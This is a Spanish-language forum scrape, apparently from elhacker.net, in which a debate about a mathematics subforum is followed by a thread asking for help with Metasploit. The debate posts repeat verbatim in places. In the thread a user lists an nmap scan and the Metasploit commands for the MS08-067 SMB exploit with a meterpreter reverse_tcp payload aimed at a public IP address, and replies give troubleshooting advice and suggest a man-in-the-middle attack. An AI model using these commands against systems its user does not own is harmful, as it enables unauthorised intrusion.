Mensajes

es hacer un foro de hazme la tarea... y verdaderamente con los que solicitan que le hagan la tarea en los foros de programacion es suficiente.

Define eso de "hazme la tarea"

Si yo pongo una integral que no tengo ni idea de resolver por decir algo, qué otro remedio queda que resolverla y explicar cómo se hizo?

Yo ese argumento lo veo como un "yo no voy a ponerme a explicarle a nadie cómo se hacen las cosas", pero existe gente a la que no le importa resolver un ejercicio y explicarlo.

El problema esta en la funcion que esto trae y la posible vulnerabilidad para explotarla

Funcion: Hacer ejercicios propuesto por un usuario para dar una idea, muy bueno al punto de vista...

Vulnerabilidad: Una botnet de usuarios mal intencionado ponen un ejercicio inofensivo cada uno..., lo resuelven y listo, ya esta hecha la tarea.

Pero si lo piensas bien pasa con todo:

"Hola me llamo Mr. X, quiero robarle el wifi a mi vecino me he bajado el wifislax, he puesto todos los comandos que aparecian en X tutorial y no me funciona, que hago?"

"Hola me llamo Mr. Y quiero juankear una página he encontrado un XSS en esta página, y ahora que hago?"

"Hola, soy Mr. Y de nuevo no conseguí juankear la página con el XSS me he bajado el SSS y he encontrado vulnerabilidades en una web, que hago para explotarlas? de donde me bajo los exploits y como los uso?"

"Hola, soy Mr. Z, quiero que me den todo el código me gustaria saber como hago para que cuando un usuario entre a mi web, clickee aquí, esté un minuto mirando esto, se pase por lo otro, [bla bla bla] y me gustaría saber cómo hacerlo... se puede hacer en html?"

mmm... ok hagamos algo mas facil, eliminemos todo lo que tiene que ver con Hacking porque el foro se llama foro.elmatematico.net. Esos ejemplos que pones, la gran mayoria son descartados en el momento que se postean y son bloqueados o eliminados por los miembros del staff.

y que tenga material diario que comentar

el de Hacking Linux/Unix es de la temática central por ejemplo, y se mueve menos que la vida sexual de un hombre de 85 años ...

El foro mira arriba que creo que eres muy inteligente, elhacker.net,  Hacking Linux/Unix,  va con el tema del foro.

es hacer un foro de hazme la tarea... y verdaderamente con los que solicitan que le hagan la tarea en los foros de programacion es suficiente.

Define eso de "hazme la tarea"

Si yo pongo una integral que no tengo ni idea de resolver por decir algo, qué otro remedio queda que resolverla y explicar cómo se hizo?

Yo ese argumento lo veo como un "yo no voy a ponerme a explicarle a nadie cómo se hacen las cosas", pero existe gente a la que no le importa resolver un ejercicio y explicarlo.

El problema esta en la funcion que esto trae y la posible vulnerabilidad para explotarla

Funcion: Hacer ejercicios propuesto por un usuario para dar una idea, muy bueno al punto de vista...

Vulnerabilidad: Una botnet de usuarios mal intencionado ponen un ejercicio inofensivo cada uno..., lo resuelven y listo, ya esta hecha la tarea.

@Los Demas: Para que un subforo sea factible no creo en lo que mostro SDC de ser 25 usuarios, deberian de ser al menos 100 usuarios, y que tenga material diario que comentar... ahora diran y el foro de GPS... no se para que esta pero me imagino que seria mas factible que uno de matematica...

Y cuando estén los 100 me vas a pedir 300? y cuando estén los 300? Me parece que la función que estás planteando está tendiendo a infinito (Límites anyone?? XDD)

Consigan 100 usuarios con mas de 50 post y aunque no apoye la idea los apoyare. yo plantearia el problema con un concepto de integrales multiples.

Fact: El otro dia estaba programando una dll para un simulador en el que planteaba un modelo atmosférico, el algoritmo que planteaba el modelo, era una fórmula matemática.

Fact: Para el mismo simulador, quize diseñar una función que me dijera la velocidad de un cuerpo en caida libre pero que la gravedad sea ajustada por la distancia (Un efecto que se hace notable a distancias muy grandes, pero real en el espacio exterior), para calcular el ángulo de reentrada y la probabilidad de que una nave se haga cenizas en la misma o sobreviva sin un rasguño.

Fact: Para otro juego diseñé un modelo de enfriamiento-calentamiento simple basado en la ley de oferta-demanda y el punto de equilibrio. También basado fuertemente en teoría matemática.

Fact: Para mi PREA, utilizé conceptos matemáticos como la entropía de la información y la probabilidad.

Podría seguir, pero creo q ha quedado claro.
Un abrazo
APOKLIPTICO

Haz tomado en consideracion de que no todo es foro.elhacker.net, esto no es un monopolio, puedes buscar en otros foros. Pero hacer un sub-foro de ciencias exactas es hacer un foro de hazme la tarea... y verdaderamente con los que solicitan que le hagan la tarea en los foros de programacion es suficiente.

@Los Demas: Para que un subforo sea factible no creo en lo que mostro SDC de ser 25 usuarios, deberian de ser al menos 100 usuarios, y que tenga material diario que comentar... ahora diran y el foro de GPS... no se para que esta pero me imagino que seria mas factible que uno de matematica...

Al Staff: Puedo proponer un subforo de Ciencias Medicas, a mi me interesa el tema

+1000

El que quiera un foro de matematicas que busque en google...

No estoy para nada de acuerdo, se esta haciendo demasiado excesiva la solicitud de sub-foros, es un foro de informatica,si se acepta un foro de ciencias exactas alguien despues solicitara uno de historia, otro de ciencias naturales, ciencias ocultas, literatura, etc... y sera un completo caos.

[Post dataestas pruebas las hago en mi casa pues tengo varias pc´s que uso como conejillos de india.]

Duda Metasploit.

Ok gente sere breve en mi duda:

Escaneo una IP con el Nmap....

Código [Seleccionar] Expandir

PORT    STATE SERVICE      VERSION

139/tcp open  netbios-ssn

445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds

Tiene el puerto 445 abierto (vulnerabilidad en el SMB), luego abro mi consola de MSF y....

msf> use windows/smb/ms08_067_netapi

Luego de esto elijo el PAYLOAD:

Código [Seleccionar] Expandir

msf> use PAYLOAD windows/meterpreter/reverse_tcp

Introduzco todas las variables con el comando "set"...

Código [Seleccionar] Expandir

set RHOST 200.xx.xx.xx
set LHOST 192.168.x.xx
set RPORT 445
set LPORT 4444
set TARGET 0

y finalmente

Código [Seleccionar] Expandir

msf> exploit

El asunto esta en que consigo mi sesion con el meterpreter sin problema alguno, pero cuando salgo de la consola del meterpreter y posteriormente del MSF, no puedo volver a conectar con el host pues da el siguiente error:

http://picasaweb.google.com/lh/photo/i0Ya_l659UiyRlKj92MIAA?feat=directlink

Sera porque el host se queda con la sesion anterior del Meterpreter?
Y si es asi, como consigo que no me siga pasando pues la cosa esta que solo consigo entrar a la pc victima una sola vez   

Post data
estas pruebas las hago en mi casa pues tengo varias pc´s que uso como conejillos de india.

Incluso el exploit funcionando no obtendras una sesion, en LHOST estas poniendo una IP privada mientras que con RHOST estas atacando una IP Publica (200.xxx.xxx.xxx), si funciona el exploit en ese ordenador tratara de hacer una conexion contra la ip 192.168.xxx.xxx de su red privada si esa direccion existe, de lo contrario no hara nada.

mmm para sniffar trafico podrias usar Ettercap y realizar un ataque MiTM

No creo que sea etico volver a crear una vulnerabilidad en un sistema en el cual ha sido reparado y lamento decepcionarte pero los troyanos no lo dan todo hecho...

La vulnerabilidad mas reciente en el servicio que corre en ese puerto es ms08_067_netapi dentro de MetaSploitFramework.

No lo lamentes tanto, cuando digo que los troyanos lo dan todo echo me refiero a que es muy facil entrar con uno y yo mismo digo que se que ya esta bastante reparado y busco la manera de volver a abrirlo para practicar metasploit, etico o no quiero aprender, aunque sea en mi propio PC.

Si es para practicar con Metasploit podrias seguir el Taller de Metasploit Unleashed que publicaron en Offensive Security